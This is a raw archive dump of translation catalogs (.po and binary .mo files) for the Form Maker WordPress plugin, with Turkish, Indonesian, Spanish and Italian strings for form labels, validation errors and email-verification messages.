#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Kasım"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Aralık"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Hata, yanlış güvenlik kodu."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Ip kara listeye alındı​​.Web sitesi yöneticisine başvurun"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Dosyasının izin verilen boyutu aşıyor"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Üzgünüz, bu türde bir dosya yüklemek için izin verilmez."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Hata, dosya taşınamaz."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "Bu alan %s benzersiz bir giriş gerektirir ve bu değer zaten sunuldu."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Hata, e-posta gönderilmedi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Hiçbir şey sunuldu."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Formunuz başarıyla gönderildi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Hata, e-posta gönderilmedi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "E-posta adresiniz zaten doğrulandı."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "E-posta başarıyla doğrulandı."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "E-posta doğrulaması zaman aşımına uğradı."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Doğrulama bağlantısı geçersiz."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "Alan gerekmektedir"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Bu geçerli bir e-posta adresi değil."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Sen eski tarih seçemezsiniz. Geçerli olandan başlayarak bir tarih seçin."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "değer arasında olmalıdır "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Miktar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Puanınız daha az olmalıdır "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Başlık:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "İlk"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Son"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Orta"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Bölge kodu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefon Numarası"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dolar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Sent"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Gönderen"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Için"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "gitmek "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "sıfırla "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Bir alan seçin "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Bir Tarih Seçiniz"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-id_ID.mo000060400000007141152434416630012146 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
G
T
\
c
h
o
x
�
$�
$�
�
�
�
#)-4MV
^l
{
�
��	�@��"8#=Ba"����P�%A
'g
+�
�
>�
5M4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:58+0400
PO-Revision-Date: 2015-05-22 16:58+0400
Last-Translator: 
Language-Team: 
Language: id
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AprilKode wilayahAgustuscents KotaNegaraDesemberDolar. Kesalahan, email tidak dikirim.Error, file tidak dapat dipindahkan.Kesalahan, kode keamanan yang salah.FebruariPertamadari pergi JanuariJuliJuniTerakhirMaretMeiTengahTidak ada yang diajukan.NovemberOktoberNomor teleponPos / Kode PosKuantitas Atur ulangPilih TanggalPilih Field SeptemberMaaf, Anda tidak diperbolehkan untuk meng-upload file jenis ini.Negara / Provinsi / WilayahStreet AddressStreet Address Line 2itu File melebihi ukuran yang diizinkanBidang %s memerlukan entri yang unik dan nilai ini sudah diajukan.Ini bukan alamat email yang valid.TitleuntukLink verifikasi tidak valid.Anda tidak dapat memilih mantan tanggal. Pilih tanggal mulai dari yang sekarang.Alamat email Anda sudah diverifikasi.Email Anda telah berhasil diverifikasi.Email verifikasi Anda telah habis waktunya.Bentuk kamu telah diserahkan.Ip Anda daftar hitam. Silahkan hubungi administrator website. Skor Anda harus kurang dari bidang yang diperlukan.Nilai harus antara languages/form_maker-es_ES.mo000060400000007435152434416630012202 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
G
W
^
e
l
	r
	|
-�
$�
*�
$*08>CI	\f	nx	����
�@�0M`)dR�*�

&
W;
9�
6�
B*G\r��4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:53+0400
PO-Revision-Date: 2015-05-22 16:54+0400
Last-Translator: 
Language-Team: 
Language: es
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
abrilcodigo de áreaAgostoCents CIUDADPaísDiciembreDólares Error, el correo electrónico no fue enviado.Error, el archivo no se puede mover.Error, el código de seguridad incorrecto.febreroPRIMERdesde ir EneroJulioJunioÚltimaMarzoMayoMedioNada se presentó.noviembreoctubreTeléfonoCódigo postalCantidad Restablecer Seleccione una fechaSeleccione un camposeptiembreLo sentimos, no están autorizados a subir este tipo de archivo.Estado / Provincia / RegiónDirección (Calle y Número)Calle Dirección 2la El archivo supera el tamaño permitido deEste campo %s requiere de una entrada única y este valor ya se había presentado.Esto no es una dirección válida de emailCargoaEnlace de verificación no es válido.No es posible seleccionar las fechas anteriores. Elija una fecha a partir de la actual.Su dirección de correo electrónico ya está verificada.Su correo electrónico se ha verificado correctamente.Tu dirección de correo electrónico de verificación ha caducado.El formulario se ha enviado correctamente.Su ip es la lista negra. Por favor, póngase en contacto con el administrador del sitio web.Su puntaje debe ser inferior a campo es obligatorio.valor debe estar entre languages/form_maker-it_IT.po000060400000057101152434416630012212 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:59+0400\n"
"PO-Revision-Date: 2015-05-22 16:59+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: it\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Indirizzo:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Via Riga indirizzo 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Città"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Stato / Provincia / Regione"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "CAP"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Paese"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Gennaio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "febbraio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "marzo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "aprile"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Maggio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "giugno"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "luglio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "agosto"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "settembre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "ottobre"

